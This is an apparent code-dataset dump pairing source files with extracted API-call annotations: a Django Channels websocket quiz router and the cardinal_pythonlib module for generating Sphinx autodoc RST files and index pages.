code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from channels.staticfiles import StaticFilesConsumer
from .consumers import ws_connect, ws_receive, ws_disconnect, new_contestant, start_quiz, submit_answer
from channels import include, route
# Although we could, there is no path matching on these routes; instead we rely
# on the matching from the top-level routing.
websocket_routing = [
# This makes Django serve static files from settings.STATIC_URL, similar
# to django.views.static.serve. This isn't ideal (not exactly production
# quality) but it works for a minimal example.
route('http.request', StaticFilesConsumer()),
# Called when WebSockets connect
route("websocket.connect", ws_connect),
# Called when WebSockets get sent a data frame
route("websocket.receive", ws_receive),
# Called when WebSockets disconnect
route("websocket.disconnect", ws_disconnect),
]
channel_routing = [
# Handling different quiz commands (websocket.receive is decoded and put
# onto this channel) - routed on the "command" attribute of the decoded
# message.
route("quiz.receive", new_contestant, command="^new_contestant$"),
route("quiz.receive", start_quiz, command="^start_quiz$"),
route("quiz.receive", submit_answer, command="^submit_answer$"),
include("quiz.routing.websocket_routing"),
] | [
"channels.staticfiles.StaticFilesConsumer",
"channels.include",
"channels.route"
] | [((639, 677), 'channels.route', 'route', (['"""websocket.connect"""', 'ws_connect'], {}), "('websocket.connect', ws_connect)\n", (644, 677), False, 'from channels import include, route\n'), ((735, 773), 'channels.route', 'route', (['"""websocket.receive"""', 'ws_receive'], {}), "('websocket.receive', ws_receive)\n", (740, 773), False, 'from channels import include, route\n'), ((820, 864), 'channels.route', 'route', (['"""websocket.disconnect"""', 'ws_disconnect'], {}), "('websocket.disconnect', ws_disconnect)\n", (825, 864), False, 'from channels import include, route\n'), ((1061, 1126), 'channels.route', 'route', (['"""quiz.receive"""', 'new_contestant'], {'command': '"""^new_contestant$"""'}), "('quiz.receive', new_contestant, command='^new_contestant$')\n", (1066, 1126), False, 'from channels import include, route\n'), ((1132, 1189), 'channels.route', 'route', (['"""quiz.receive"""', 'start_quiz'], {'command': '"""^start_quiz$"""'}), "('quiz.receive', start_quiz, command='^start_quiz$')\n", (1137, 1189), False, 'from channels import include, route\n'), ((1195, 1258), 'channels.route', 'route', (['"""quiz.receive"""', 'submit_answer'], {'command': '"""^submit_answer$"""'}), "('quiz.receive', submit_answer, command='^submit_answer$')\n", (1200, 1258), False, 'from channels import include, route\n'), ((1264, 1305), 'channels.include', 'include', (['"""quiz.routing.websocket_routing"""'], {}), "('quiz.routing.websocket_routing')\n", (1271, 1305), False, 'from channels import include, route\n'), ((573, 594), 'channels.staticfiles.StaticFilesConsumer', 'StaticFilesConsumer', ([], {}), '()\n', (592, 594), False, 'from channels.staticfiles import StaticFilesConsumer\n')] |
#!/usr/bin/env python
# cardinal_pythonlib/sphinxtools.py
"""
===============================================================================
Original code copyright (C) 2009-2020 <NAME> (<EMAIL>).
This file is part of cardinal_pythonlib.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================================================
**Functions to help with Sphinx, in particular the generation of autodoc
files.**
Rationale: if you want Sphinx ``autodoc`` code to appear as "one module per
Sphinx page" (which I normally do), you need one ``.rst`` file per module.
"""
from enum import Enum
from fnmatch import fnmatch
import glob
import logging
from os.path import (
abspath, basename, dirname, exists, expanduser, isdir, isfile, join,
relpath, sep, splitext
)
from typing import Dict, Iterable, List, Union
from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir
from cardinal_pythonlib.logs import BraceStyleAdapter
from cardinal_pythonlib.reprfunc import auto_repr
from pygments.lexer import Lexer
from pygments.lexers import get_lexer_for_filename
from pygments.util import ClassNotFound
# Module-level logger supporting {}-style ("brace") format placeholders.
log = BraceStyleAdapter(logging.getLogger(__name__))
# =============================================================================
# Constants
# =============================================================================
# RST comment inserted near the top of every generated file, to warn editors.
AUTOGENERATED_COMMENT = ".. THIS FILE IS AUTOMATICALLY GENERATED. DO NOT EDIT."
# Default title for an autodoc index page.
DEFAULT_INDEX_TITLE = "Automatic documentation of source code"
# Filenames skipped by default when scanning for source files.
DEFAULT_SKIP_GLOBS = ["__init__.py"]
# File extensions we care about.
EXT_PYTHON = ".py"
EXT_RST = ".rst"
# Pygments language name meaning "no syntax highlighting".
CODE_TYPE_NONE = "none"
class AutodocMethod(Enum):
    """
    Enum to specify the method of autodocumenting a file.
    """
    BEST = 0  # pick AUTOMODULE for Python files, CONTENTS otherwise
    CONTENTS = 1  # include the file's contents with syntax highlighting
    AUTOMODULE = 2  # use Sphinx's ".. automodule::" directive (Python only)
# =============================================================================
# Helper functions
# =============================================================================
def rst_underline(heading: str, underline_char: str) -> str:
    """
    Produce an RST-style underlined heading.

    Args:
        heading: text to underline (must not contain a newline)
        underline_char: the single character to use for the underline

    Returns:
        two lines -- the heading, then an underline of matching length --
        with no trailing newline
    """
    assert "\n" not in heading
    assert len(underline_char) == 1
    underline = underline_char * len(heading)
    return f"{heading}\n{underline}"
def fail(msg: str) -> None:
    """
    Log a critical message, then raise :exc:`RuntimeError` with that message.
    """
    log.critical(msg)
    raise RuntimeError(msg)
def write_if_allowed(filename: str,
                     content: str,
                     overwrite: bool = False,
                     mock: bool = False) -> None:
    """
    Writes the contents to a file, if permitted.

    Args:
        filename: filename to write
        content: contents to write
        overwrite: permit overwrites?
        mock: pretend to write, but don't

    Raises:
        RuntimeError: if file exists but overwriting not permitted
    """
    # Refuse to clobber an existing file unless explicitly allowed.
    if not overwrite and exists(filename):
        fail(f"File exists, not overwriting: {filename!r}")

    # Ensure the destination directory exists (unless we're only pretending).
    if not mock:
        mkdir_p(dirname(filename))

    # Write the file (or, in mock mode, just log that we would have).
    log.info("Writing to {!r}", filename)
    if mock:
        log.warning("Skipping writes as in mock mode")
        return
    with open(filename, "wt") as outfile:
        outfile.write(content)
# =============================================================================
# FileToAutodocument
# =============================================================================
class FileToAutodocument(object):
    """
    Class representing one source file to be documented automatically via
    Sphinx autodoc: it can generate the text of, and write, a single ``.rst``
    file documenting that source file.

    Example:

    .. code-block:: python

        from cardinal_pythonlib.sphinxtools import *

        f = FileToAutodocument(
            source_filename="~/code/myproj/myproj/thing.py",
            project_root_dir="~/code/myproj",
            target_rst_filename="~/code/myproj/docs/source/autodoc/thing.rst",
        )
        print(f.rst_content(prefix=".. Hello!"))
        f.write_rst(prefix=".. Hello!")
    """

    def __init__(self,
                 source_filename: str,
                 project_root_dir: str,
                 target_rst_filename: str,
                 method: AutodocMethod = AutodocMethod.BEST,
                 python_package_root_dir: str = None,
                 source_rst_title_style_python: bool = True,
                 pygments_language_override: Dict[str, str] = None) -> None:
        """
        Args:
            source_filename: source file (e.g. Python, C++, XML file) to
                document
            project_root_dir: root directory of the whole project
            target_rst_filename: filename of an RST file to write that will
                document the source file
            method: instance of :class:`AutodocMethod`; for example, should we
                ask Sphinx's ``autodoc`` to read docstrings and build us a
                pretty page, or just include the contents with syntax
                highlighting?
            python_package_root_dir: if your Python modules live in a directory
                other than ``project_root_dir``, specify it here
            source_rst_title_style_python: if ``True`` and the file is a Python
                file and ``method == AutodocMethod.AUTOMODULE``, the heading
                used will be in the style of a Python module, ``x.y.z``.
                Otherwise, it will be a path (``x/y/z``).
            pygments_language_override: if specified, a dictionary mapping
                file extensions to Pygments languages (for example: a ``.pro``
                file will be autodetected as Prolog, but you might want to
                map that to ``none`` for Qt project files).
        """
        self.source_filename = abspath(expanduser(source_filename))
        self.project_root_dir = abspath(expanduser(project_root_dir))
        self.target_rst_filename = abspath(expanduser(target_rst_filename))
        self.method = method
        self.source_rst_title_style_python = source_rst_title_style_python
        # Default the Python package root to the project root.
        self.python_package_root_dir = (
            abspath(expanduser(python_package_root_dir))
            if python_package_root_dir else self.project_root_dir
        )
        self.pygments_language_override = pygments_language_override or {}  # type: Dict[str, str]  # noqa
        assert isfile(self.source_filename), (
            f"Not a file: source_filename={self.source_filename!r}")
        assert isdir(self.project_root_dir), (
            f"Not a directory: project_root_dir={self.project_root_dir!r}")
        assert relative_filename_within_dir(
            filename=self.source_filename,
            directory=self.project_root_dir
        ), (
            f"Source file {self.source_filename!r} is not within "
            f"project directory {self.project_root_dir!r}"
        )
        assert relative_filename_within_dir(
            filename=self.python_package_root_dir,
            directory=self.project_root_dir
        ), (
            f"Python root {self.python_package_root_dir!r} is not within "
            f"project directory {self.project_root_dir!r}"
        )
        assert isinstance(method, AutodocMethod)

    def __repr__(self) -> str:
        return auto_repr(self)

    @property
    def source_extension(self) -> str:
        """
        Returns the extension of the source filename (e.g. ``.py``).
        """
        return splitext(self.source_filename)[1]

    @property
    def is_python(self) -> bool:
        """
        Is the source file a Python file?
        """
        return self.source_extension == EXT_PYTHON

    @property
    def source_filename_rel_project_root(self) -> str:
        """
        Returns the name of the source filename, relative to the project root.
        Used to calculate file titles.
        """
        return relpath(self.source_filename, start=self.project_root_dir)

    @property
    def source_filename_rel_python_root(self) -> str:
        """
        Returns the name of the source filename, relative to the Python package
        root. Used to calculate the name of Python modules.
        """
        return relpath(self.source_filename,
                       start=self.python_package_root_dir)

    @property
    def rst_dir(self) -> str:
        """
        Returns the directory of the target RST file.
        """
        return dirname(self.target_rst_filename)

    @property
    def source_filename_rel_rst_file(self) -> str:
        """
        Returns the source filename as seen from the RST filename that we
        will generate. Used for ``.. literalinclude::`` commands.
        """
        return relpath(self.source_filename, start=self.rst_dir)

    @property
    def rst_filename_rel_project_root(self) -> str:
        """
        Returns the filename of the target RST file, relative to the project
        root directory. Used for labelling the RST file itself.
        """
        return relpath(self.target_rst_filename, start=self.project_root_dir)

    def rst_filename_rel_autodoc_index(self, index_filename: str) -> str:
        """
        Returns the filename of the target RST file, relative to a specified
        index file. Used to make the index refer to the RST.
        """
        index_dir = dirname(abspath(expanduser(index_filename)))
        return relpath(self.target_rst_filename, start=index_dir)

    @property
    def python_module_name(self) -> str:
        """
        Returns the name of the Python module that this instance refers to,
        in dotted Python module notation, or a blank string if it doesn't
        refer to a Python file.
        """
        if not self.is_python:
            return ""
        filepath = self.source_filename_rel_python_root
        dirs_and_base = splitext(filepath)[0]
        # Convert path separators to Python module dots: x/y/z -> x.y.z
        dir_and_file_parts = dirs_and_base.split(sep)
        return ".".join(dir_and_file_parts)

    @property
    def pygments_language(self) -> str:
        """
        Returns the code type annotation for Pygments; e.g. ``python`` for
        Python, ``cpp`` for C++, etc. Falls back to ``none`` (no highlighting)
        for unrecognized extensions.
        """
        extension = splitext(self.source_filename)[1]
        # Explicit overrides take precedence over Pygments autodetection.
        if extension in self.pygments_language_override:
            return self.pygments_language_override[extension]
        try:
            lexer = get_lexer_for_filename(self.source_filename)  # type: Lexer
            return lexer.name
        except ClassNotFound:
            log.warning("Don't know Pygments code type for extension {!r}",
                        self.source_extension)
            return CODE_TYPE_NONE

    def rst_content(self,
                    prefix: str = "",
                    suffix: str = "",
                    heading_underline_char: str = "=",
                    method: AutodocMethod = None) -> str:
        """
        Returns the text contents of an RST file that will automatically
        document our source file.

        Args:
            prefix: prefix, e.g. RST copyright comment
            suffix: suffix, after the part we're creating
            heading_underline_char: RST character to use to underline the
                heading
            method: optional method to override ``self.method``; see
                constructor

        Returns:
            the RST contents
        """
        spacer = "    "
        # Choose our final method
        if method is None:
            method = self.method
        is_python = self.is_python
        if method == AutodocMethod.BEST:
            # AUTOMODULE only makes sense for Python files.
            method = (AutodocMethod.AUTOMODULE if is_python
                      else AutodocMethod.CONTENTS)
        elif method == AutodocMethod.AUTOMODULE and not is_python:
            method = AutodocMethod.CONTENTS
        # Write the instruction
        if method == AutodocMethod.AUTOMODULE:
            if self.source_rst_title_style_python:
                title = self.python_module_name
            else:
                title = self.source_filename_rel_project_root
            instruction = (
                f".. automodule:: {self.python_module_name}\n"
                f"{spacer}:members:"
            )
        elif method == AutodocMethod.CONTENTS:
            title = self.source_filename_rel_project_root
            # Using ".. include::" with options like ":code: python" doesn't
            # work properly; everything comes out as Python.
            # Instead, see http://www.sphinx-doc.org/en/1.4.9/markup/code.html;
            # we need ".. literalinclude::" with ":language: LANGUAGE".
            instruction = (
                ".. literalinclude:: {filename}\n"
                "{spacer}:language: {language}".format(
                    filename=self.source_filename_rel_rst_file,
                    spacer=spacer,
                    language=self.pygments_language,
                )
            )
        else:
            raise ValueError("Bad method!")
        # Create the whole file. (Blank lines are significant in RST: the
        # title and each directive must be separated by them.)
        content = """
.. {filename}

{AUTOGENERATED_COMMENT}

{prefix}

{underlined_title}

{instruction}

{suffix}
""".format(
            filename=self.rst_filename_rel_project_root,
            AUTOGENERATED_COMMENT=AUTOGENERATED_COMMENT,
            prefix=prefix,
            underlined_title=rst_underline(
                title, underline_char=heading_underline_char),
            instruction=instruction,
            suffix=suffix,
        ).strip() + "\n"
        return content

    def write_rst(self,
                  prefix: str = "",
                  suffix: str = "",
                  heading_underline_char: str = "=",
                  method: AutodocMethod = None,
                  overwrite: bool = False,
                  mock: bool = False) -> None:
        """
        Writes the RST file to our destination RST filename, making any
        necessary directories.

        Args:
            prefix: as for :func:`rst_content`
            suffix: as for :func:`rst_content`
            heading_underline_char: as for :func:`rst_content`
            method: as for :func:`rst_content`
            overwrite: overwrite the file if it exists already?
            mock: pretend to write, but don't
        """
        content = self.rst_content(
            prefix=prefix,
            suffix=suffix,
            heading_underline_char=heading_underline_char,
            method=method
        )
        write_if_allowed(self.target_rst_filename, content,
                         overwrite=overwrite, mock=mock)
# =============================================================================
# AutodocIndex
# =============================================================================
class AutodocIndex(object):
    """
    Class to make an RST file that indexes other (automatically generated)
    RST files, each documenting one source file. Indexes may be nested.

    Example:

    .. code-block:: python

        from cardinal_pythonlib.sphinxtools import *

        idx = AutodocIndex(
            index_filename="~/code/myproj/docs/source/autodoc/_index.rst",
            highest_code_dir="~/code/myproj",
            project_root_dir="~/code/myproj",
            autodoc_rst_root_dir="~/code/myproj/docs/source/autodoc",
            source_filenames_or_globs="~/code/myproj/myproj/*.py",
        )
        print(idx.index_content())
        idx.write_index_and_rst_files(overwrite=True, mock=True)
    """

    def __init__(self,
                 index_filename: str,
                 project_root_dir: str,
                 autodoc_rst_root_dir: str,
                 highest_code_dir: str,
                 python_package_root_dir: str = None,
                 source_filenames_or_globs: Union[str, Iterable[str]] = None,
                 index_heading_underline_char: str = "-",
                 source_rst_heading_underline_char: str = "~",
                 title: str = DEFAULT_INDEX_TITLE,
                 introductory_rst: str = "",
                 recursive: bool = True,
                 skip_globs: List[str] = None,
                 toctree_maxdepth: int = 1,
                 method: AutodocMethod = AutodocMethod.BEST,
                 rst_prefix: str = "",
                 rst_suffix: str = "",
                 source_rst_title_style_python: bool = True,
                 pygments_language_override: Dict[str, str] = None) -> None:
        """
        Args:
            index_filename:
                filename of the index ``.RST`` (ReStructured Text) file to
                create
            project_root_dir:
                top-level directory for the whole project
            autodoc_rst_root_dir:
                directory within which all automatically generated ``.RST``
                files (each to document a specific source file) will be placed.
                A directory hierarchy within this directory will be created,
                reflecting the structure of the code relative to
                ``highest_code_dir`` (q.v.).
            highest_code_dir:
                the "lowest" directory such that all code is found within it;
                the directory structure within ``autodoc_rst_root_dir`` is to
                ``.RST`` files what the directory structure is of the source
                files, relative to ``highest_code_dir``.
            python_package_root_dir:
                if your Python modules live in a directory other than
                ``project_root_dir``, specify it here
            source_filenames_or_globs:
                optional string, or list of strings, each describing a file or
                glob-style file specification; these are the source filenames
                to create automatic RST for. If you don't specify them here,
                you can use :func:`add_source_files`. To add sub-indexes, use
                :func:`add_index` and :func:`add_indexes`.
            index_heading_underline_char:
                the character used to underline the title in the index file
            source_rst_heading_underline_char:
                the character used to underline the heading in each of the
                source files
            title:
                title for the index
            introductory_rst:
                extra RST for the index, which goes between the title and the
                table of contents
            recursive:
                use :func:`glob.glob` in recursive mode?
            skip_globs:
                list of file names or file specifications to skip; e.g.
                ``['__init__.py']``
            toctree_maxdepth:
                ``maxdepth`` parameter for the ``toctree`` command generated in
                the index file
            method:
                see :class:`FileToAutodocument`
            rst_prefix:
                optional RST content (e.g. copyright comment) to put early on
                in each of the RST files
            rst_suffix:
                optional RST content to put late on in each of the RST files
            source_rst_title_style_python:
                make the individual RST files use titles in the style of Python
                modules, ``x.y.z``, rather than path style (``x/y/z``); path
                style will be used for non-Python files in any case.
            pygments_language_override:
                if specified, a dictionary mapping file extensions to Pygments
                languages (for example: a ``.pro`` file will be autodetected as
                Prolog, but you might want to map that to ``none`` for Qt
                project files).
        """
        assert index_filename
        assert project_root_dir
        assert autodoc_rst_root_dir
        assert isinstance(toctree_maxdepth, int)
        assert isinstance(method, AutodocMethod)
        assert isinstance(recursive, bool)
        self.index_filename = abspath(expanduser(index_filename))
        self.title = title
        self.introductory_rst = introductory_rst
        self.project_root_dir = abspath(expanduser(project_root_dir))
        self.autodoc_rst_root_dir = abspath(expanduser(autodoc_rst_root_dir))
        self.highest_code_dir = abspath(expanduser(highest_code_dir))
        # Default the Python package root to the project root.
        self.python_package_root_dir = (
            abspath(expanduser(python_package_root_dir))
            if python_package_root_dir else self.project_root_dir
        )
        self.index_heading_underline_char = index_heading_underline_char
        self.source_rst_heading_underline_char = source_rst_heading_underline_char  # noqa
        self.recursive = recursive
        self.skip_globs = skip_globs if skip_globs is not None else DEFAULT_SKIP_GLOBS  # noqa
        self.toctree_maxdepth = toctree_maxdepth
        self.method = method
        self.rst_prefix = rst_prefix
        self.rst_suffix = rst_suffix
        self.source_rst_title_style_python = source_rst_title_style_python
        self.pygments_language_override = pygments_language_override or {}  # type: Dict[str, str]  # noqa
        assert isdir(self.project_root_dir), (
            f"Not a directory: project_root_dir={self.project_root_dir!r}")
        assert relative_filename_within_dir(
            filename=self.index_filename,
            directory=self.project_root_dir
        ), (
            f"Index file {self.index_filename!r} is not within "
            f"project directory {self.project_root_dir!r}"
        )
        assert relative_filename_within_dir(
            filename=self.highest_code_dir,
            directory=self.project_root_dir
        ), (
            f"Highest code directory {self.highest_code_dir!r} is not within "
            f"project directory {self.project_root_dir!r}"
        )
        assert relative_filename_within_dir(
            filename=self.autodoc_rst_root_dir,
            directory=self.project_root_dir
        ), (
            f"Autodoc RST root directory {self.autodoc_rst_root_dir!r} is not "
            f"within project directory {self.project_root_dir!r}"
        )
        self.files_to_index = []  # type: List[Union[FileToAutodocument, AutodocIndex]]  # noqa
        if source_filenames_or_globs:
            self.add_source_files(source_filenames_or_globs)

    def __repr__(self) -> str:
        return auto_repr(self)

    def add_source_files(
            self,
            source_filenames_or_globs: Union[str, List[str]],
            method: AutodocMethod = None,
            recursive: bool = None,
            source_rst_title_style_python: bool = None,
            pygments_language_override: Dict[str, str] = None) -> None:
        """
        Adds source files to the index.

        Args:
            source_filenames_or_globs: string containing a filename or a
                glob, describing the file(s) to be added, or a list of such
                strings
            method: optional method to override ``self.method``
            recursive: use :func:`glob.glob` in recursive mode? (If ``None``,
                the default, uses the version from the constructor.)
            source_rst_title_style_python: optional to override
                ``self.source_rst_title_style_python``
            pygments_language_override: optional to override
                ``self.pygments_language_override``
        """
        if not source_filenames_or_globs:
            return
        # Fall back to the constructor-time defaults for unspecified options.
        if method is None:
            method = self.method
        if recursive is None:
            recursive = self.recursive
        if source_rst_title_style_python is None:
            source_rst_title_style_python = self.source_rst_title_style_python
        if pygments_language_override is None:
            pygments_language_override = self.pygments_language_override
        # Get a sorted list of filenames
        final_filenames = self.get_sorted_source_files(
            source_filenames_or_globs,
            recursive=recursive
        )
        # Process that sorted list
        for source_filename in final_filenames:
            self.files_to_index.append(FileToAutodocument(
                source_filename=source_filename,
                project_root_dir=self.project_root_dir,
                python_package_root_dir=self.python_package_root_dir,
                target_rst_filename=self.specific_file_rst_filename(
                    source_filename
                ),
                method=method,
                source_rst_title_style_python=source_rst_title_style_python,
                pygments_language_override=pygments_language_override,
            ))

    def get_sorted_source_files(
            self,
            source_filenames_or_globs: Union[str, List[str]],
            recursive: bool = True) -> List[str]:
        """
        Returns a sorted list of filenames to process, from a filename,
        a glob string, or a list of filenames/globs.

        Args:
            source_filenames_or_globs: filename/glob, or list of them
            recursive: use :func:`glob.glob` in recursive mode?

        Returns:
            sorted list of files to process
        """
        if isinstance(source_filenames_or_globs, str):
            source_filenames_or_globs = [source_filenames_or_globs]
        final_filenames = []  # type: List[str]
        for sfg in source_filenames_or_globs:
            sfg_expanded = expanduser(sfg)
            log.debug("Looking for: {!r}", sfg_expanded)
            for filename in glob.glob(sfg_expanded, recursive=recursive):
                log.debug("Trying: {!r}", filename)
                if self.should_exclude(filename):
                    log.info("Skipping file {!r}", filename)
                    continue
                final_filenames.append(filename)
        final_filenames.sort()
        return final_filenames

    @staticmethod
    def filename_matches_glob(filename: str, globtext: str) -> bool:
        """
        The ``glob.glob`` function doesn't do exclusion very well. We don't
        want to have to specify root directories for exclusion patterns. We
        don't want to have to trawl a massive set of files to find exclusion
        files. So let's implement a glob match.

        Args:
            filename: filename
            globtext: glob

        Returns:
            does the filename match the glob?

        See also:

        - https://stackoverflow.com/questions/20638040/glob-exclude-pattern
        """
        # Try the full filename first:
        if fnmatch(filename, globtext):
            log.debug("{!r} matches {!r}", filename, globtext)
            return True
        # ... then the basename alone (so e.g. "__init__.py" matches
        # "/any/path/__init__.py"):
        bname = basename(filename)
        if fnmatch(bname, globtext):
            log.debug("{!r} matches {!r}", bname, globtext)
            return True
        # Directory matching: is actually accomplished by the code above!
        # Otherwise:
        return False

    def should_exclude(self, filename) -> bool:
        """
        Should we exclude this file from consideration (because it matches
        one of our ``skip_globs``)?
        """
        for skip_glob in self.skip_globs:
            if self.filename_matches_glob(filename, skip_glob):
                return True
        return False

    def add_index(self, index: "AutodocIndex") -> None:
        """
        Add a sub-index file to this index.

        Args:
            index: index file to add, as an instance of :class:`AutodocIndex`
        """
        self.files_to_index.append(index)

    def add_indexes(self, indexes: List["AutodocIndex"]) -> None:
        """
        Adds multiple sub-indexes to this index.

        Args:
            indexes: list of sub-indexes
        """
        for index in indexes:
            self.add_index(index)

    def specific_file_rst_filename(self, source_filename: str) -> str:
        """
        Gets the RST filename corresponding to a source filename.
        See the help for the constructor for more details.

        Args:
            source_filename: source filename within current project

        Returns:
            RST filename

        Note in particular: the way we structure the directories means that we
        won't get clashes between files with identical names in two different
        directories. However, we must also incorporate the original source
        filename, in particular for C++ where ``thing.h`` and ``thing.cpp``
        must not generate the same RST filename. So we just add ``.rst``.
        """
        highest_code_to_target = relative_filename_within_dir(
            source_filename, self.highest_code_dir)
        bname = basename(source_filename)
        result = join(self.autodoc_rst_root_dir,
                      dirname(highest_code_to_target),
                      bname + EXT_RST)
        log.debug("Source {!r} -> RST {!r}", source_filename, result)
        return result

    def write_index_and_rst_files(self, overwrite: bool = False,
                                  mock: bool = False) -> None:
        """
        Writes both the individual RST files and the index.

        Args:
            overwrite: allow existing files to be overwritten?
            mock: pretend to write, but don't
        """
        for f in self.files_to_index:
            if isinstance(f, FileToAutodocument):
                f.write_rst(
                    prefix=self.rst_prefix,
                    suffix=self.rst_suffix,
                    heading_underline_char=self.source_rst_heading_underline_char,  # noqa
                    overwrite=overwrite,
                    mock=mock,
                )
            elif isinstance(f, AutodocIndex):
                # Sub-indexes recurse.
                f.write_index_and_rst_files(overwrite=overwrite, mock=mock)
            else:
                fail(f"Unknown thing in files_to_index: {f!r}")
        self.write_index(overwrite=overwrite, mock=mock)

    @property
    def index_filename_rel_project_root(self) -> str:
        """
        Returns the name of the index filename, relative to the project root.
        Used for labelling the index file.
        """
        return relpath(self.index_filename, start=self.project_root_dir)

    def index_filename_rel_other_index(self, other: str) -> str:
        """
        Returns the filename of this index, relative to the directory of
        another index. (For inserting a reference to this index into
        ``other``.)

        Args:
            other: the other index

        Returns:
            relative filename of our index
        """
        return relpath(self.index_filename, start=dirname(other))

    def index_content(self) -> str:
        """
        Returns the contents of the index RST file.
        """
        # Build the toctree command
        index_filename = self.index_filename
        spacer = "    "
        toctree_lines = [
            ".. toctree::",
            spacer + f":maxdepth: {self.toctree_maxdepth}",
            ""
        ]
        for f in self.files_to_index:
            if isinstance(f, FileToAutodocument):
                rst_filename = spacer + f.rst_filename_rel_autodoc_index(
                    index_filename)
            elif isinstance(f, AutodocIndex):
                rst_filename = (
                    spacer + f.index_filename_rel_other_index(index_filename)
                )
            else:
                fail(f"Unknown thing in files_to_index: {f!r}")
                rst_filename = ""  # won't get here; for the type checker
            toctree_lines.append(rst_filename)
        toctree = "\n".join(toctree_lines)
        # Create the whole file. (Blank lines are significant in RST: the
        # title, toctree, and other sections must be separated by them.)
        content = """
.. {filename}

{AUTOGENERATED_COMMENT}

{prefix}

{underlined_title}

{introductory_rst}

{toctree}

{suffix}
""".format(
            filename=self.index_filename_rel_project_root,
            AUTOGENERATED_COMMENT=AUTOGENERATED_COMMENT,
            prefix=self.rst_prefix,
            underlined_title=rst_underline(
                self.title, underline_char=self.index_heading_underline_char),
            introductory_rst=self.introductory_rst,
            toctree=toctree,
            suffix=self.rst_suffix,
        ).strip() + "\n"
        return content

    def write_index(self, overwrite: bool = False, mock: bool = False) -> None:
        """
        Writes the index file, if permitted.

        Args:
            overwrite: allow existing files to be overwritten?
            mock: pretend to write, but don't
        """
        write_if_allowed(self.index_filename, self.index_content(),
                         overwrite=overwrite, mock=mock)
| [
"logging.getLogger",
"os.path.exists",
"pygments.lexers.get_lexer_for_filename",
"cardinal_pythonlib.reprfunc.auto_repr",
"os.path.splitext",
"cardinal_pythonlib.fileops.relative_filename_within_dir",
"os.path.isfile",
"os.path.dirname",
"os.path.isdir",
"fnmatch.fnmatch",
"os.path.basename",
... | [((1712, 1739), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1729, 1739), False, 'import logging\n'), ((3665, 3682), 'os.path.dirname', 'dirname', (['filename'], {}), '(filename)\n', (3672, 3682), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((3531, 3547), 'os.path.exists', 'exists', (['filename'], {}), '(filename)\n', (3537, 3547), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((3708, 3726), 'cardinal_pythonlib.fileops.mkdir_p', 'mkdir_p', (['directory'], {}), '(directory)\n', (3715, 3726), False, 'from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir\n'), ((7693, 7721), 'os.path.isfile', 'isfile', (['self.source_filename'], {}), '(self.source_filename)\n', (7699, 7721), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((7809, 7837), 'os.path.isdir', 'isdir', (['self.project_root_dir'], {}), '(self.project_root_dir)\n', (7814, 7837), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((7932, 8029), 'cardinal_pythonlib.fileops.relative_filename_within_dir', 'relative_filename_within_dir', ([], {'filename': 'self.source_filename', 'directory': 'self.project_root_dir'}), '(filename=self.source_filename, directory=self.\n project_root_dir)\n', (7960, 8029), False, 'from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir\n'), ((8213, 8317), 'cardinal_pythonlib.fileops.relative_filename_within_dir', 'relative_filename_within_dir', ([], {'filename': 'self.python_package_root_dir', 'directory': 'self.project_root_dir'}), '(filename=self.python_package_root_dir,\n directory=self.project_root_dir)\n', (8241, 8317), False, 'from cardinal_pythonlib.fileops import mkdir_p, 
relative_filename_within_dir\n'), ((8591, 8606), 'cardinal_pythonlib.reprfunc.auto_repr', 'auto_repr', (['self'], {}), '(self)\n', (8600, 8606), False, 'from cardinal_pythonlib.reprfunc import auto_repr\n'), ((9180, 9238), 'os.path.relpath', 'relpath', (['self.source_filename'], {'start': 'self.project_root_dir'}), '(self.source_filename, start=self.project_root_dir)\n', (9187, 9238), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((9487, 9552), 'os.path.relpath', 'relpath', (['self.source_filename'], {'start': 'self.python_package_root_dir'}), '(self.source_filename, start=self.python_package_root_dir)\n', (9494, 9552), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((9714, 9747), 'os.path.dirname', 'dirname', (['self.target_rst_filename'], {}), '(self.target_rst_filename)\n', (9721, 9747), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((9986, 10035), 'os.path.relpath', 'relpath', (['self.source_filename'], {'start': 'self.rst_dir'}), '(self.source_filename, start=self.rst_dir)\n', (9993, 10035), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((10283, 10345), 'os.path.relpath', 'relpath', (['self.target_rst_filename'], {'start': 'self.project_root_dir'}), '(self.target_rst_filename, start=self.project_root_dir)\n', (10290, 10345), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((10663, 10713), 'os.path.relpath', 'relpath', (['self.target_rst_filename'], {'start': 'index_dir'}), '(self.target_rst_filename, start=index_dir)\n', (10670, 10713), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((23642, 23670), 
